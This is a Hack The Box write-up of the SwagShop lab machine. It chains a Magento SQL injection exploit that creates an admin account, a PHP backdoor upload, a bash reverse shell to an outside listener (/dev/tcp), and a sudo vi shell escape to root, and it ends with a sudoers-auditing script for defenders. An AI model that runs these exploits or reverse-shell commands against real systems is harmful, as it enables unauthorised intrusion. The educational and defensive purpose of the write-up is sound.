Hack The Box: SwagShop machine write-up
This machine, which runs on IP 10.10.10.140, was a really good and entertaining way of learning about the Magento CMS and how different exploits can be chained together to achieve RCE. The first one is a SQL injection that lets us add a user to the Magento database, which then grants us access to the admin panel. From there, we can upload a backdoor that can be escalated to root thanks to a misconfiguration on the server that lets us run vi as user root.
The only downside of it was that most people were making it crash all the time, which made it really hard for me to be able to experiment without constant resets… Overall I’d say this was one of the most unstable boxes I’ve done.
As always, we start by enumerating open ports to discover the services running on the machine. I fire up nmap:
Result of nmap scan
```
# Nmap 7.70 scan initiated Tue Jun 11 10:41:39 2019 as: nmap -sV -sC -oA nmap/initial 10.10.10.140
Nmap scan report for 10.10.10.140
Host is up (0.025s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Error 503: Service Unavailable
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jun 11 10:41:53 2019 -- 1 IP address (1 host up) scanned in 14.33 seconds
```
We don’t have much, just SSH and a web server, so we’ll start by checking out port 80.
Web server enumeration
At first we are greeted with what looks like a store. I immediately run dirb in the background so that it works while I tinker around with the website.
Website found on port 80
I didn’t find much manually, so I came back to check the dirb results and bingo! It found something:
```
-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Jun 12 17:18:17 2019
URL_BASE: http://10.10.10.140/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.140/ ----
==> DIRECTORY: http://10.10.10.140/app/
==> DIRECTORY: http://10.10.10.140/downloader/
==> DIRECTORY: http://10.10.10.140/errors/
+ http://10.10.10.140/favicon.ico (CODE:200|SIZE:1150)
==> DIRECTORY: http://10.10.10.140/includes/
+ http://10.10.10.140/index.php (CODE:200|SIZE:16097)
==> DIRECTORY: http://10.10.10.140/js/
==> DIRECTORY: http://10.10.10.140/lib/
==> DIRECTORY: http://10.10.10.140/media/
==> DIRECTORY: http://10.10.10.140/pkginfo/
+ http://10.10.10.140/server-status (CODE:403|SIZE:300)
==> DIRECTORY: http://10.10.10.140/shell/
==> DIRECTORY: http://10.10.10.140/skin/
==> DIRECTORY: http://10.10.10.140/var/
```
Under /downloader we can observe that the website is using Magento, a CMS that has been the subject of a number of attacks in the past.
Control panel for Magento
Gaining user with Magento
We don’t have any credentials to log in to the control panel, so I went straight to searchsploit to see if there were any exploits available.
Results from searchsploit search
I started trying all of them until one finally worked: Magento eCommerce - Remote Code Execution. I copied the Python script to my working directory with searchsploit -m exploits/xml/webapps/37977.py and had a look at it. It looked like a SQL injection, so I ran it after modifying the following line:
```python
target = "http://10.10.10.140/index.php"
```
Then I set the credentials I wanted to root2u:root2u and ran it:
Output of exploit script
Then I just log in to the panel with those creds, which gives me the option to upload some kind of package:
/downloader control panel
I googled around and found a website explaining how to create a package from a simple PHP file. I followed it and used the PHP shell from pentestmonkey. However, it didn’t work: the PHP file was treated as a directory when I tried to access it.
Uploading the module as a .tar.gz file doesn’t work
Eventually I bumped into an article on the internet where they used another extension, .tgz. I tried it and it worked!
http://10.10.10.140/errors2/backdoor.php grants me a shell and we can read the user flag:
Shell gained from php backdoor
Getting to root
Once in this shell I noticed that I needed a proper interactive shell, so I opened another netcat listener and ran bash -c 'bash -i >& /dev/tcp/10.10.12.11/8080 0>&1'.
After that, I ran sudo -l to see if I could run any commands as root, and it turned out that I could:
Improving the shell
I can run the file editor vi as root on files under /var/www/html/*, so I created a new file and used a shell command from within vi to read the root flag (commands can be executed from vi’s command line):
Getting the root hash
And that’s it! I could also have run :!/bin/bash to get a root shell and read the flag from there, but I just did it this way as it was more straightforward.
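The defender’s counterpart to the sudo -l finding above: an added example (not part of the original write-up) that scans a sudoers file for rules like the one on this box, where a program able to spawn a shell is allowed as root and the command path carries a wildcard. The sudoers text is constructed to mirror the rule seen here, and the binary list is a partial set of well-known shell-capable programs.

```python
import re
from dataclasses import dataclass

# Programs that let the caller run arbitrary commands once they execute as root
# (vi's ":!cmd" is the escape used on SwagShop). Partial list, for illustration.
SHELL_ESCAPE_BINS = {"vi", "vim", "view", "less", "more", "man", "ed", "awk", "perl", "python", "python3"}

# user host=(runas) [TAG:] cmd1, cmd2 ...  (Defaults and alias lines are skipped)
SPEC_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
SKIP_PREFIXES = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")

@dataclass
class Finding:
    user: str
    command: str
    reason: str

def audit_sudoers(text: str) -> list:
    """Flag sudoers rules that amount to handing out a root shell."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drops comments and #include lines
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = SPEC_RE.match(line)
        if not m or m.group("user") == "root":  # root already has everything
            continue
        user = m.group("user")
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            cmd = re.sub(r"^(?:[A-Z]+:\s*)+", "", cmd)  # strip NOPASSWD:, SETENV:, ...
            if not cmd:
                continue
            if cmd == "ALL":
                findings.append(Finding(user, cmd, "unrestricted ALL"))
                continue
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if binary in SHELL_ESCAPE_BINS:
                findings.append(Finding(user, cmd, f"{binary} can spawn a shell"))
            if "*" in cmd:  # sudo globs also match '/', so the rule covers far more than one directory
                findings.append(Finding(user, cmd, "wildcard in command argument"))
    return findings

# Constructed sample modelled on the rule seen on this box; not the machine's real file.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root     ALL=(ALL:ALL) ALL
%sudo    ALL=(ALL:ALL) ALL
www-data ALL=(root) NOPASSWD: /usr/bin/vi /var/www/html/*
deploy   ALL=(root) NOPASSWD: /bin/systemctl restart apache2, /usr/bin/less /var/log/apache2/error.log
"""
```

Running audit_sudoers(SAMPLE_SUDOERS) reports the www-data rule twice (shell-capable editor and wildcard), the less rule for deploy, and the blanket ALL for %sudo.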
I hope you learned something with this cool box and enjoyed the write-up!
Diego Bernal Adelantado